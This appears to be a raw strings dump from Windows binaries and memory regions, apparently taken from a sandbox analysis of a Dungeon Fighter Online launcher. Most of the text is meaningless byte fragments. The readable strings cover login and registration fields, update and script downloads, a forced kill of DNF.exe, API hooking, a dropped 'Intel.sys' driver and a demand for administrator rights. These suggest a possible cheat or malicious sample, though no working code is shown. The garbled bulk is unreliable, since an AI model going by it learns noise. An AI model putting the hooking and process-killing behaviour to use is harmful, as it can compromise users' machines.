nob.wX`#j
%a.dp
.qI-K
? .RMTaG
"Tdb.wY
.RMTa/{U
hSZ.eG
5"C
5-w6}
,9>%Fr1
M?;1.Bt
.Pak!
q.xC,
:7:{&.UTdDG
5Ni.aF
.fn%WhdK
b..SY
X|%%s
.mPobz
JP%s7
W:\(Q%
!-,%S
u.yb]
%f^V9N
MZ .XT7
I:.iy"
ro7.VPF
U.QJu
r.Mai>:9
9z.af
zn%3X
&.yb]
wU].QZ
1.rR4S
0?k.iw
i.fFI
ExitWindowsEx
5r.qa
.bfFa
*.me.
c{/&%fx
`B.vc
%um|T
v$%S_T
[,j"&.qX<PI
KERNEL32.dll
.ut`?w
Dw%ft
USER32.dll
7}7
6*7074787<7
< <$<(<,<0<4<8<
0S091K1h1
0 0$0(0,0
4I[o%x
ADVAPI32.dll
.YGFNY
Z-ÿ
ShellExecuteW
y.UP|
$R%Ug
J^o%S
~%C  =
/l.Yg
KDÔ
h4h%fSo
)f%sem5`
re.gg%
g.jTlYS6#g08
gg7%sAg
.JmgG]7g
igD%6ug
9.gx<|
.igZGqLR-
lt%SQ
u.Cg(z
nsUDP
ro.Oo
MSgge
sa-X}5
{7À=&s
.va\VB
2.lG<
.gyy*
ys.gi
}.agn
eX.eA7e
,0%FRS.
.go0;
Lkg@3O.gx!
7.eX/
)%S$g
c-WU.ix
!`@.ne~
P~udP)5
%umOG~
mL%X.
i.HgX
bmSg
4W.bgq
.Ebt8
vO%U7
.ve.B
%X-cV
.ZgU]
.bVoj
%x=CZk
]@.AV
%UYCg LJp
G.frg
.Cn#{%F
.gZ-?8O
.Zgz"G
M.lgj
b%UETg4
a.YQX
.gi&h_
p;.Id
o?D'.vSj
%DK|g0;
.PDg=
0o%xb~Og
iOv.gi
/gD
.oUKd
Bxb%Upl
.Tg!S
Rd.o~"f%S@n
).nE8L^
.Bb^g
<.gTc
Ú4Vjsg
P.gga
ef.eUDex
iN~.fX
} Q%s
.gNG7Kg
'WeB#VQd
".bGQ
h.cg`n\
.gYi\
.hz?h$
.TKC3
.zG{y
'.RT?
.nXVi*Tc
.nu>G
g%u3P
8<%C?gL
Zg[%X
_H.ZXB
.iyG[
7M5{ %s
ki|PUQ)%c
g.lX-
f%x@G
Jg.Bu
V.M2%F
5%dS0
W}%DK
.ALBK
l^X%XS
.oUl)g4
%d.@m
#`.gy
2}O.cQo
ggH%U
oj.TLX
Y.Zmzg
:~Z.gHa
Od.Ug
Wgýb
"#.Ga
EtCpG
:i.ge
\SkQouBKq}5.yj
J~XW.Io
.mg-g
.gvoV
'-x}g&K>
.ggq%
.gg?Y
u%Uej
QFÔ
<g~.PS
e.YLI
tK.ck
Uo%cl
y;%DZ
`%U)*xZce
ig.hg
-.gh8
Dg.gUu
}.CU7
.JggYs&
-'.Tk
.fgX*
%xg;i
.gYcC
.gh%@
5<%4xo
os.eN{
YP3-i}D
g_w%4so
ng%S?g7
Og.cgHO~hgx
1ig3Y&]%c
.uzeg
.gA7}F
^:j%S(ggb
<:jg%#msg
uRlg#&
gXCS%f
J.gPW=g
Mzdg`%x
.HAg|
Kg_(p.gge
*3.gxPo
.gch^."
.gEgo_
 .Dgv
ggf.NAV
jg$u`.dgC
.Aog$
W0.gg[;
q.Gg[
fQZ.gF
.gtc*=
.grCL8
i.Vgg
.gH))g
7C%dH
gt g#.hg
.rHgsy6
'.gSf
05.Bpg
.gKg'
ny.Ias
.ggQs
.gQ7-
.Yzeg
Jg5%uQ
gT.gw
ogf%sV
Ri%DZ7
.gGgi
gH.Weg
H.Ej9'E
?gn%X
;g*.ag
)D.gq
%S0Fin
;g.jL
!S.gn
g0V.gl
.gY @
:.ct -y
9g,|MV.gvG
.gH7o;
%SWgg
<.Wcg(
.gwX-R
gdg.gG
@uH.bgg
g%f Z
|9gV.gO
.gRd'J
.gTt;gH
gbe{%D
\(.gC
i.gJO
gd.ha
5-tC}_kgE
Qig%SvzEg
}V%X7
Wog9.ze
~Igbg%C
NW.gt
.gygvR
.gkgu,5
x.gJpz(g
g@Qng%c
?.eg8`'G=
.gk~gg=z_
(-.gg
gg8%s
 g[.gne
.gzCp
5h.ggc
-'.gV
'a9.xtE
.AY=g
T.Og)
WR.Mg<[
JFWgg*B.rH
j.ghgQ
1/.nD
.gPu?
JyW.gt
.xV$g
W.gf#
-7J}g
.ug!;
g2.gT
1]`g.wc
.Doz$S
.ugg\
.igTg
.ggU\
.DJVP
gE{%DI
.geh5
].Fj'
7%xgg
.egD7w
gV.agX
dgg%D
gE}.hb@
,g".gCf
lgx.Img
a%Xg6p^
msg-4c
`g.Cu
.Ycg'
:.gYK-y
.gRo3
-SF}g
.VLljd
F.HZbgn
%SDgH.Qv
L.gq<_l
yt=%%X|
.zog2
=g{%d
!g.ha Q
kc%D^M
g%d`@n
W.ocgm
\.wta
k.ggf
gv.oM
.cbVP
.zggt
%C/_o-a
gg.ov
Lg.cgw9g?
~.gEa
c.%cl
bge%D$=
;g.beg
%dg2c
cg.Io6
'ci%c
c2%c\ c
HH.igQ?
Ê>T
E/e.uu="/g
/7%U7
o.To8
o%Fo? o
.iGD>P#Tt
-i=%U[ga
g%Dz5
%s'Wn
/.zTCy
o.HODge$
Fh.cE
cf~c!%c
g!H#%f$g
H.egy
.gg#7]
%cWzg
61eJ.Lb
-g.NV
2e.ye
g%s1q-
.aMa}
yv%sJ
og7.tT
w.acgm%
?kg%x
cg c.gH
G.aG"
Je.sB
7*C70]7%u7x@7
oE.oG
P.Bya
f8.Sp
.Bz *u
.DVY|qg
FÝg
8T.gd
'n%COkL)
GgkfY.gg
xagZ.gg
gcC.%u
,.goI}WO
msGVT
6[gg%fiZ
.ByYI
F~-.gg
%DYkg
.gHgA8
Zkg%UL~Lg
2.kg^b
-qW.gF
r.gud
fg .Ap
g.WMg
Msgc
su1.QxgGA
}.ocw2
gB.gH
VN.xc
79g.QE
D.kNJ
,BQk.Cj=g
.wDl^m-v
g-BJ}
g4NHý
GgA%uo-K
'.nUl
Gg.QKg gc
FMJ%c
g.cE93
J.gPk@
.FkgL
1Mo.OA
Xg(J.jh
mSgBI
%5.gH
%CngR
!.Xoz
T.gnL
.jgmL
þgg
FTP7z
ah}
g_.Ad
<LY.gUc
GI<%U'@w'uf'
\-gH}
.nOiigb8~
1S.cg
~H.gP:v
%.nTg
'.Qg5
.Tg&-/
6%XdD_ec
%sFgV
@E.gh
x.gw$G
-o}'B
oekm&.cg
N%f.Q7
5g%cH
d>V:MSgD
K.gj[
%X-cg
.Jvm*g
co.bn
%u9kgK
:g%X])
.zFC_
Ce%d"
.QOAx
5*%CX!
z.aI?g
<4H
.TX4:g
7.NSs
%U,Ho
gO9.zN
[g.Ny
gk.rqj
gO.aov~
G.Wok
5]4gj.Vs
~Y.Afg
2.Gp=
gTcp5
_.FgOl
.igyL;
U:\X>g&
.nGole;
-}%X$Kgh
g.HkwNQ
\}7%S
 O.vD1
g2M%u
%DQ\gI
kEy*WVBj
s^.LS4
4K?q.gM[3
/x%Ug
c.kD[
Z2.Kg
7.YTv3I4i
u.nB'4
g]i.Cy
S%XgUB
O|%sV
P~D.OAg
_]%UE
q.uxI
gdUCmDu
.GwB/
%xgzr
.eE$Z
.kpXg
1.fg$
.kgnb{
%c?;`h0
#.OgW
%].NX
M;<#
.YewhU
/>g%u
,g.cn
%S[0g
(/%c_
%dN`/
".xm6
=E.nU
i.gaq|
.Po>'
-g8}j
%U{(j
NeK^7k.gf
sg.eC
.Dc>e
.oSL4
.oQNX
m!&XxK9bo.Ha
5.gk?7f
Iz(%C
X.Og|
.qa%G
CgFq.crg
g.YF1
)_.vt
".NYg^t
dU%xk
.ke]yg|
`~.GLc
3I-g}7{
Y.nyg
8_`g%R\.IB
g.sC86*
.gU x
/.ypWg
%c) S
tQ.lg
[]og1%f
.gn_YP
>n3%c
3=.sW
gq.lb)y
&<.gG!
p/g.og
B c.xgJ
*.XpO~g
-.ega
.gi13E
gm%X@
]d.PW
.HZlz
$1E%c
WgcBx%Ug
kq.gr
0.ox1
(I5n%x
.iAg=
@%k-LU}g6
&g.vol
c.Lkf
4u6.Li
_m%4so
d#goZB%xv
?.sa5
.gLGU
lkz%.Gg
.ggI@!
`hxXrcLÊ
cofgt%sl
tc.go
.ek6E(
#XIc\.cE
4g$.gb7
$gh$h.KH
zgX%SGk
`g.ZBg
X4g.Bkmn
g%cg/
.nX^|
.mg>^tO
zú(g
78Tn.gM
V@.Lg
%X$mgM
hq1g.rVz
.TEgg
g.endb
.ggj<
J.gnX
[>o.YN
q.iH]W7g
NICkw
fgQ"%X
ho.eo
.ohg#
^Em%U
Tcpe
]zkURL
pog%C
Yogr\#8.gg
ERg%u
u_.gTG
Rnw.gc
<g.Oq@
:.gMwN
'lY%0xk
igIÎ
.uDgw(
gzgg.fc
,^kg%xfG
%sTg7X3
yKEYog
.Y%cY
.gg!8`H
qjgm%u
n{.gc
V/.ob
g1"/%D
y%UH'L_
kg.Sg
.gg4ZN
.gceu
`g.pT
.TJng8'
%f/B{
#.Lj*
<.nEg
G.Et-b7aJ
vK.gkJ
YgA2.Vk
P6-c}E\
%u`K@
g]L".ei
9Qu%D
.gdp$
ßgx
@<-I}g
ge%u 
4.Ea<g
GMsg
R7.SZO
Cmsg
.gg%q
,/.ng7
Ÿkgt5
v.jkRI
`g .vK
.Slyl
.yx&c'
n%X/C
=X5.fb
iHv%xgn
(D%Xgg
L_5%d`gg
8\.xOn
6(-X}
.ga7T_ cp
%cV!g
?%uDzeOg
v>g%s
gEg%S7WV7
lI%U47_
7G^2.vfge
^_mP.Xu
B.Ic^g
S<.Bg
Y6Ç
#d_ Xw.Teo
e.zY=
m =|i
%Dw25
.igCw
"gN.zC
W.ggG
cS%XJ
!.rkn
tgce%F
=%6S 8
\? .Zg
.rR)H
=.gjX
".gvK
eD.gnE
c.Ky5
=j.rn
 .Wg(
)CbM%f=ggL}T
.cTpG
:g%cw
Kg.Ew\
5e%Si7!ng
6f#&eT%X
-i}Q>g
~lg\.Uom
N7.Vyib
)%x*q
-nrgi}:*#
@g}.pZI
y.Plags,
'.gWl
zkeY`g
"#Uba,kW.vB
R.sgV
MP[Ê
t%Dg<
7`Qf.oE)r
qkK%cGgp
>$.ogC
S/.Og
%Cnkg
,.tgD
t=Ik
".ReZ
!gJ.ja=g
%UQDN
IS.org
nr-gK}
g.dXU_
gI%u@
?M.Fgg%
>.To_
XN%f`g
i.KJ\
g9[%C;
.gT^Y
P.gbB
hgg%S
g,.qn
b%%.Lgg
B|o.og
@`gg`.UjW
j$g.tx3
ÓEg
'g.no
O%d|ci
uu.ec
X%ug@/'
v.nV#]
%tCPa
Hgc%D
.gngg
v.yglw
H:I.igog
kgF%f
=s%uP
dc?.AHRmg
bge%x
%Sg9%
K ú
a[%C=3
.QJg M
.gO}q
Oh%Su
8@.sk
aZ.Vb
.ob=H
g\.HK:k
qQ.INAFq.
Af.jr(F!sz
C@.iq6
&.qX<"
"}.un=
SHELL32.dll
"7user32.dll
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
mscoree.dll
KERNEL32.DLL
WUSER32.DLL
E%sIntel.sys
%sIntel.exe
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:

%original file name%.exe_2956_rwx_01380000_00504000:

zr_]UbN
.xV``
.YB}n=
.uBs{(JBq
&.uFi
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
activation.php?code=
deactivation.php?hash=
y2.eu:
.?AVIUrlBuilderSource@@
c:\%original file name%.exe
` Bb]%X
.Ujb!7l$_s
.jbBA
uDp'\T?UT6
^U.Qf
/.XZViC
"%1zqQ.Rog$
YQ.EM6
$[.zZ9)~M
-%fT\;Q
L.rg-
%F/.0
(nF%sr5-
Y<ÚK
.ToDLCF
Q.EMN
-r.arz%l\
".qZE=
_DsSH[Tq
M:.yjJu|h# 
\TCpAIN
v.uYQ2Ls
VeRr%3x 
.utDd'3|
m&y.Wh{(
7h}%f
".qPd
.Wh2N
xX_C~^%xtC
Ni%f*
.uJjQ?p8_
.so$:evV=
&.yxHh7
xOKCXQai.EMf
MfY2M2.af
Ee.cS[4'
r.uYQ>
$kdDw#hp .hJ
5va.Ire&YF
).yb-~
5NCsSH
-b}u6
&.YqLl 
]:.aq2
".yU~F
6 ]em.Poh
kc(>m&.UT
n.yU]"
.ek4'/`x
.YJIZ-
.qbj)
c.zrA
V^%dT\C
!~Q.IreFg(
0OZjb=
(c.zrE
>U!-b}6u
(oe2.yTp?
}.yb-{
^.px3
<c.zZa2:e
_@.qe
'gi.de
z-b}u
Mf:m%fz%
i.EMV
e.EeF
wPAE%uz
V^Ð
HkXPCNZ5&.UTdl
n%Ux 
Jm%f| 
8"th/%fn
&.yxH@_3Lck<3l
C8 s)z.yi6"e
`em.DE'
X !j~_:
J%Dpx
L^.px
.MEnc7?|
.AVme&k?
via:.yoD
 dt#4<[.zrA
.Yn_W0
4[.zr
-BP2}6
V^Ð8O>2
.zZE< w
0/'l=ia.Ee*`
.yFf=`?
M2.aL@W
%fOk,WX
-Mm}u
)r-%f
Rr_]Ufk?
]2.qa"
.yb1bA
uQ.IBUB]V
`a%fh3_-
%7U}u2
QY.Ee6
|?p{(M:.eb
".qPL3l
/.XT?
W8.anNa
dUI6i.aB
-2}JjE-^qQZ
n^V-%fp,
rs/.yM
.meF$
{.IY(ssp
.iw(W_0;3PCL
f!V^%dT\W
ck4g(s0U.aF
)gQ^TcPp f2:Q
}.yb-V=
&.iw(v
%fyq&Y
9RM6a.Ify
.iPdC
.zr-ZR]
.YBYbU
&.im%
Kd_Lq.OTo$
}.un1z=
.ie_Z
&.YDHoWa
m&.wJ
.XT7?P
%FY:s
}.qy&4gZ
vj=w
P<.leTI_-
C".qPd7
S@.iq
&e.EM>s'
.eixn
~„c_
u.ybY
bZ5Oy&b%dH{m
e.anf9x,$
UT".iRAL
kGp/.XT[ 
h`7r&.ir
j$=z.ue:
.iPdO
.iNEj)
V^%dT\ @`G
S-j}]2wGg,
CZ.pPS/
Z5%fH
.iD`W
.evV=
.TS\E
uAz.qbjU
(m4.TA
".ab9)f
.uFukjg
071=^6<7<
QT".qe
nfÐ
FfÐ
2.eA{'nS
=r.iPdC
.Yj)R5
cU.Ee
5z.qa
%DL;gZ
e2.qa"
7l?h[Hm.aN
c'TCpx
NJ= \Ÿ
kKpy-%f
}Y.aR
&.iw<
&.uJjA
%fqQf<s/
kV|9.tPG
Wd<o%ft'
Q:d~ykc@.YfFU}
pP7r&.iq
sSHW<
S[0y-%f[GD
/\-yY.de
"U].UdDG
%F}uB
-ytu}
'|sSHr%
9b".aJIZE~
d.NeRr9
aEr.uc4
H^.px
^5-j}
"U.bQ
}V^%dTtC
.Tp';
>6UbSsH
V-&.irz-"u
.IqC~
.ab9p@H?."}
-G.RU
}.ybM
BJU\lLC".qy*
}.qy&4gNjE
g~v%dT
.qD`/?
q.uTK
U:v.Mai
i2.eu>
!;m.GKR
h.jls
.hsPb3
.hsPf5a
.hC:f
_qf%xrb
|e.eZ*
Js%sX
.odTa
.HA; 
`h%fp
.oVSa
d1.Zf.
nB.MCU
.UC\&
&.Zf*L
|e.uE
%SqM:2
.VRKHV=
V|"'mOusSh
4 `h%fp
|^.dd
.Nn59
{.UFt
-l%d)
.IC\&
.zq)y6
B;3%x
bBE.rcD
.FM\m
.g(%d,dc
s9G.lB,
uudPC
Kqñ*
>-%x(
.gJw/
\.vN%
.YRKBf
H%U|[
H%Us[
).JS3
'%X~&
/.DTa
8U.VBF
z31 e.VB
L.za=
.Aye?$
.DFIM
}-Sh}m
JFtp
$]%D#X
|e.VR
!C.YB
dR.XE
I!K.bB
JP%d,
Q%c:x
;lz%u
vrý
trK%U
ryf=.wKH?
s-E}.
nd.va
5<.tj
Q/}
.U%D$9
.Zl@ h;
BZ.ti
DD.ZZ
pj.YK&
 *%sVO6
J.Bx=
`%s},
.GDZe
.Bg=I
3@F%x
F.uljH
w.LXVL
oC%d@
).cuP
3.vUu
>Z.Dq
.MDRw
{?a%u_
K\X.emh
2^:_56!5
%X#X2Vy8h
yFTP
/.Lec
wW%sw8;x$
.lcHp
X\%dZ
t%fnL
dessH
(1.Wl:
`.pLv
}gq%Xp
h\1(.zU
I`.PkG
%X@X!(j
%u6mO.
H\.kH@
TH 9EXe
.MvV`
UXY.uE
.ly1z
%c!OA
JExE
.GXoj
Dg.pL
x_.Xw
.Cxs#
c4.XC
.UE%3
H.Ib*OE
s.Qa4KG
*0%UtR
d\).zO
@%fpL1
F24

.SLOL
%Sk%6
%4.d{
Cz:%C
*M.QS~
%Fu^gw
%XSP}
>ge.DM
x*O2%U
-3}xH
u7H%S
c%x0.
~d.hz
RL
G,Y%U
M.hzc
.CL",
.Any1V
bB$,F
.DBE:
%u@-N
fJi.FH
.Hy6e
8Tt%u)
.MU_(
[{%fH#d
r4)%UG
.lD?g3w
#(.HS
tweb
.mQH5
.yi,Q
U%c*P
Z/.kY]
wBZ.cw
K%U=-
.BU{,i
a=%do5
Wpmsg
(.une`
H%U-=
wBZ.cs
6J<.GWy
wBZ.wJ
.UMTa
UgO.eQ
%Dk*qH
1%XWw
99.%F
.uk@B
AjT%s
5>%F"2
ftPy
=X-Q}
eG.uN
.QU=~
W`~%xx
ÞJ6
4n!.kT "
T%S0F?V
pI%SmJ*^
%Ubq%
X%Djy[
=.ptS
#&.ns
.XMTa
.Nr_d
o.PVX
,p3%x
d%s15(
.zVZ?
G.dV'
QweB0
d=cüi
g|%Cv
=.aG)c
iSTZ%u
8 IK3%d
#%fW[iG
T{%S8
M:.hP
W$.wI/i
AA.pV
jZ.znI
%D-m=
Zg-A}
}*r%d/
.>t%f(
d.ck3p
.Ej#6`
nob.wX`#j
%a.dp
.qI-K
? .RMTaG
"Tdb.wY
.RMTa/{U
hSZ.eG
5"C
5-w6}
,9>%Fr1
M?;1.Bt
.Pak!
q.xC,
:7:{&.UTdDG
5Ni.aF
.fn%WhdK
b..SY
X|%%s
.mPobz
JP%s7
W:\(Q%
!-,%S
u.yb]
%f^V9N
MZ .XT7
I:.iy"
ro7.VPF
U.QJu
r.Mai>:9
9z.af
zn%3X
&.yb]
wU].QZ
1.rR4S
KERNEL32.DLL
mscoree.dll
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:

Reality.log_1796:

.text
`.sedata
h.idata
H.sedata
.fIygf
sMsgType
sKey
lpMsgBuf
pWebBrowser
strKeyName
%UUUU
kCv.SCv?lCvg
ux
//./%s
X-X-X-X-X-X
00-00-00-00-00-00
TaskKill.exe
/F /IM DNF.exe
x -
%s x
20161029
skin\LoginGame\
res.xml
LoginGame.zip
LoginGame
edit.edit.account
edit.edit.oldpassword
edit.edit.newpassword
edit.edit.qq
edit.reg.account
edit.reg.password1
edit.reg.password2
edit.reg.qq
checkbox.login.save
edit.login.account
edit.login.password
button.login.enter
button.regaccount
button.cdk
button.editpwd
text.title
text.notice
.\Config.ini
Password
tabctrl.controls
text.load
text.check
text.login
text.build
\DNF.exe
\Script.pvf
%d.%d.%d.%d
update.exe
\update.exe
dnf.exe
DlgMain.xml
button.reg.cancel
button.reg.enter
button.edit.cancel
button.edit.enter
edit.cdk.account
button.cdk.cancel
button.cdk.query
button.cdk.enter
button.mainhome
button.down
button.paycheck
DNF.EXE
progress.update
DOF.zip
Script.PVF
PVF.zip
.\DNF.exe
combo.cdk.role
edit.cdk.code
msgwnd
message.type
DlgMssage.xml
MsgWnd
%s(%s)
%s(X)
pvf_url
exe_url
mainhome_url
download_url
paycheck_url
login_ver
DNF_LoginGame
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
-1.1.3
1.1.3
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
dest='%d,%d,%d,%d'
keyboard
XML Error: %s
msimg32.dll
EXCEPTION: %s(%d)
Core\UIManager.cpp
User32.dll
windowsize
CWebBrowserUI
CHotKeyUI
password
passwordchar
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
Riched20.dll
M-d-d
WebBrowserUI
WebBrowser
{D27CDB6E-AE6D-11CF-96B8-444553540000}
ListTextExElement
ListTextExElementUI
HotKeyClass
msctls_hotkey32
HotKeyUI
HotKey
fade='%d'
o@Shcore.dll
Shcore.dll
unsupported bit depth
unsupported format
unsupported data layout
monochrome
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
?#%X.y
RegOpenKeyExW
RegCloseKey
GetProcessWindowStation
operator
LoginGame.exe
??0CHotKeyUI@DuiLib@@QAE@ABV01@@Z
??0CHotKeyUI@DuiLib@@QAE@XZ
??0CHotKeyWnd@DuiLib@@QAE@ABV01@@Z
??0CHotKeyWnd@DuiLib@@QAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@ABV01@@Z
??0CWebBrowserUI@DuiLib@@QAE@XZ
??1CHotKeyUI@DuiLib@@UAE@XZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??4CHotKeyUI@DuiLib@@QAEAAV01@ABV01@@Z
??4CHotKeyWnd@DuiLib@@QAEAAV01@ABV01@@Z
??4CWebBrowserUI@DuiLib@@QAEAAV01@ABV01@@Z
??_7CHotKeyUI@DuiLib@@6B@
??_7CHotKeyWnd@DuiLib@@6B@
??_7CWebBrowserUI@DuiLib@@6BCControlUI@1@@
??_7CWebBrowserUI@DuiLib@@6BIDispatch@@@
??_7CWebBrowserUI@DuiLib@@6BIDocHostUIHandler@@@
??_7CWebBrowserUI@DuiLib@@6BIMessageFilterUI@1@@
??_7CWebBrowserUI@DuiLib@@6BIOleCommandTarget@@@
??_7CWebBrowserUI@DuiLib@@6BIServiceProvider@@@
??_7CWebBrowserUI@DuiLib@@6BITranslateAccelerator@1@@
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?AddSuportedFormat@CIDropTarget@DuiLib@@QAEXAAUtagFORMATETC@@@Z
?BeforeNavigate2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@1111AAPAF@Z
?CalPos@CHotKeyWnd@DuiLib@@QAE?AUtagRECT@@XZ
?CommandStateChange@CWebBrowserUI@DuiLib@@IAEXJF@Z
?CreateControl@CHotKeyUI@DuiLib@@SAPAVCControlUI@2@XZ
?CreateControl@CWebBrowserUI@DuiLib@@SAPAVCControlUI@2@XZ
?DUI__TraceMsg@DuiLib@@YAPBDI@Z
?DoCreateControl@CWebBrowserUI@DuiLib@@UAE_NXZ
?DoEvent@CHotKeyUI@DuiLib@@UAEXAAUtagTEventUI@2@@Z
?DocumentComplete@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@@Z
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?EstimateSize@CHotKeyUI@DuiLib@@UAE?AUtagSIZE@@U3@@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?FindId@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_W@Z
?GetAutoURLDetect@CRichEditUI@DuiLib@@QBE_NXZ
?GetClass@CHotKeyUI@DuiLib@@UBEPBDXZ
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
?GetControlFlags@CHotKeyUI@DuiLib@@UBEIXZ
?GetDisabledImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetExternal@CWebBrowserUI@DuiLib@@UAGJPAPAUIDispatch@@@Z
?GetFocusedImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetHomePage@CWebBrowserUI@DuiLib@@QAEPBDXZ
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?GetHotImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetHotKey@CHotKeyUI@DuiLib@@QBEKXZ
?GetHotKey@CHotKeyUI@DuiLib@@QBEXAAG0@Z
?GetHotKey@CHotKeyWnd@DuiLib@@QBEKXZ
?GetHotKey@CHotKeyWnd@DuiLib@@QBEXAAG0@Z
?GetHotKeyName@CHotKeyWnd@DuiLib@@QAE?AVCDuiString@2@XZ
?GetHtmlWindow@CWebBrowserUI@DuiLib@@QAEPAUIDispatch@@XZ
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetInterface@CHotKeyUI@DuiLib@@UAEPAXPBD@Z
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetKeyName@CHotKeyWnd@DuiLib@@QAE?AVCDuiString@2@IH@Z
?GetMessageMap@CNotifyPump@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?GetNativeBkColor@CHotKeyUI@DuiLib@@QBEKXZ
?GetNormalImage@CHotKeyUI@DuiLib@@QAEPBDXZ
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?GetPasswordChar@CEditUI@DuiLib@@QBEDXZ
?GetProperty@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_WPAUtagVARIANT@@@Z
?GetSuperClassName@CHotKeyWnd@DuiLib@@UBEPBDXZ
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?GetWebBrowser2@CWebBrowserUI@DuiLib@@QAEPAUIWebBrowser2@@XZ
?GetWindowClassName@CHotKeyWnd@DuiLib@@UBEPBDXZ
?GetWindowStyls@CEditUI@DuiLib@@QBEHXZ
?GoBack@CWebBrowserUI@DuiLib@@QAEXXZ
?GoForward@CWebBrowserUI@DuiLib@@QAEXXZ
?HandleMessage@CHotKeyWnd@DuiLib@@UAEJIIJ@Z
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?Init@CHotKeyWnd@DuiLib@@QAEXPAVCHotKeyUI@2@@Z
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?InvokeMethod@CWebBrowserUI@DuiLib@@SAJPAUIDispatch@@PA_WPAUtagVARIANT@@2H@Z
?IsAutoNavigation@CWebBrowserUI@DuiLib@@QAE_NXZ
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?IsPasswordMode@CEditUI@DuiLib@@QBE_NXZ
?IsShowHtml@CComboUI@DuiLib@@QAE_NXZ
?IsShowHtml@CLabelUI@DuiLib@@QAE_NXZ
?IsShowHtml@CListContainerHeaderItemUI@DuiLib@@QAEHXZ
?IsShowHtml@CListHeaderItemUI@DuiLib@@QAE_NXZ
?IsShowShadow@CShadowUI@DuiLib@@QBE_NXZ
?IsShowText@CProgressUI@DuiLib@@QAE_NXZ
?IsShowUpdateRect@CPaintManagerUI@DuiLib@@QBE_NXZ
?Join@CDuiRect@DuiLib@@QAEXABUtagRECT@@@Z
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?NavigateComplete2@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@@Z
?NavigateError@CWebBrowserUI@DuiLib@@IAEXPAUIDispatch@@AAPAUtagVARIANT@@11AAPAF@Z
?NavigateHomePage@CWebBrowserUI@DuiLib@@QAEXXZ
?NavigateUrl@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?NewWindow3@CWebBrowserUI@DuiLib@@IAEXPAPAUIDispatch@@AAPAFKPA_W2@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnEditChanged@CHotKeyWnd@DuiLib@@QAEJIIJAAH@Z
?OnFinalMessage@CHotKeyWnd@DuiLib@@UAEXPAUHWND__@@@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?OnKillFocus@CHotKeyWnd@DuiLib@@QAEJIIJAAH@Z
?PaintStatusImage@CHotKeyUI@DuiLib@@UAEXPAUHDC__@@@Z
?PaintText@CHotKeyUI@DuiLib@@UAEXPAUHDC__@@@Z
?ProgressChange@CWebBrowserUI@DuiLib@@IAEXJJ@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?Refresh2@CWebBrowserUI@DuiLib@@QAEXH@Z
?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ
?RegisterEventHandler@CWebBrowserUI@DuiLib@@IAEJH@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?ReleaseControl@CWebBrowserUI@DuiLib@@MAEXXZ
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
